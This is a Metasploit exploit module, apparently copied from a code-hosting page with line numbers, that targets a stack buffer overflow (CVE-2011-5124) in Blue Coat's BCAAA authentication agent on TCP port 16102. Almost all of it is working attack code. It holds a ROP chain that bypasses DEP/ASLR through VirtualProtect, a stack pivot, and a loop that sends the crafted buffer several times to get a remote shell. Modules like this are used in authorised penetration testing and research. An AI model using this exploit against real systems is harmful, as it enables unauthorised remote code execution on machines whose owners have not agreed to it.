Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
16
        which comes as part of the Blue Coat Authentication proxy.  Please note that by default,
17
        this exploit will attempt up to three times in order to successfully gain remote code
18
        execution (in some cases, it takes as many as five times).  This can cause your activity
19
        to look even more suspicious.  To modify the number of exploit attempts, set the
20
        ATTEMPTS option.
21
      },
22
      'License'        => MSF_LICENSE,
23
      'Author'         =>
24
        [
25
          'Paul Harrington', # Initial discovery and PoC
26
          'Travis Warren',   # MSF Module with Universal DEP/ASLR bypass
27
          'sinn3r',          # More testing / reliability, plus minor changes
28
        ],
29
      'References'     =>
30
        [
31
          [ 'CVE', '2011-5124' ],
32
          [ 'OSVDB', '72095'],
33
          [ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
34
          [ 'URL', 'https://seclists.org/bugtraq/2011/Jul/44' ]
35
        ],
36
      'Payload'        =>
37
        {
38
          'Space'    => 936,
39
          'BadChars' => "\x00",
40
          'StackAdjustment' => -3500,
41
        },
42
      'Platform'       => 'win',
43
      'Targets'        =>
44
        [
45
          [ 'BCAAA Version 5.4.6.1.54128', {} ],
46
        ],
47
      'Privileged'     => false,
48
      'DisclosureDate' => '2011-04-04',
49
      'DefaultTarget'  => 0))
50

51
      register_options(
52
        [
53
          Opt::RPORT(16102),
54
          OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
55
        ])
56
  end
57

58
  def junk
59
    return rand_text(4).unpack("L")[0].to_i
60
  end
61

62
  def exploit
63

64
    rop_gadgets = [
65
      # rop chain generated with mona.py
66
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
67
      0x7c37a140,  # Make EAX readable
68
      0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
69
      junk,        # EBP (filler)
70
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
71
      0x7c37a140,  # <- *&VirtualProtect()
72
      0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
73
      0x7c346c0b,  # Slide, so next gadget would write to correct stack location
74
      0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
75
      junk,        # EDI (filler)
76
      junk,        # will be patched at runtime (VP), then picked up into ESI
77
      junk,        # EBX (filler)
78
      0x7c376402,  # POP EBP # RETN (msvcr71.dll)
79
      0x7c345c30,  # ptr to 'push esp #  ret ' (from MSVCR71.dll)
80
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
81
      0xfffffdff,  # size 0x00000201 -> ebx, modify if needed
82
      0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)
83
      0x7c354901,  # POP EBX # RETN (MSVCR71.dll)
84
      0xffffffff,  # pop value into ebx
85
      0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)
86
      0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
87
      0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)
88
      0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
89
      0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)
90
      0x7c34b8d8,  # ROP NOP (-> edi)
91
      0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)
92
      0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
93
      0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)
94
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
95
      0x90909090,  # NOPS (-> eax)
96
      0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
97
    ].pack("V*")
98

99
    pivot = [
100
      0x7C3410C4,  # RETN (MSVCR71.dll)
101
      0x1003800C,  # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
102
      0x4241467D,  # EBP
103
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
104
      0x7C3417D2,  # SUB EAX,EAX; RETN (MSVCR71.dll)
105
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
106
      0x7C34f6C2,  # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
107
      junk,        # EBX
108
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
109
      0x5D02D0A0,  # SUB EBP,EAX; RETN (MSVCR70.dll)
110
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
111
      0x7C3B5080,  # XCHG EAX,ESP; RETN (MSVCP71.dll)
112
    ].pack("V*")
113

114
    attempts = datastore['ATTEMPTS']
115

116
    #Sometimes a few attempts are needed to get a shell back (3 or 5 times)
117
    attempts.times do |i|
118
      #If we have a session on the box already, then we don't continue trying
119
      break if session_created?
120
      buffer =  rand_text(8)
121
      buffer << rop_gadgets
122
      buffer << payload.encoded
123
      buffer << 'EBAB'
124
      buffer << rand_text(8)
125
      buffer << pivot
126

127
      connect
128
      print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...")
129
      sock.put(buffer)
130
      handler
131
      select(nil, nil, nil, 2)
132
      disconnect
133
    end
134
  end
135
end
136

137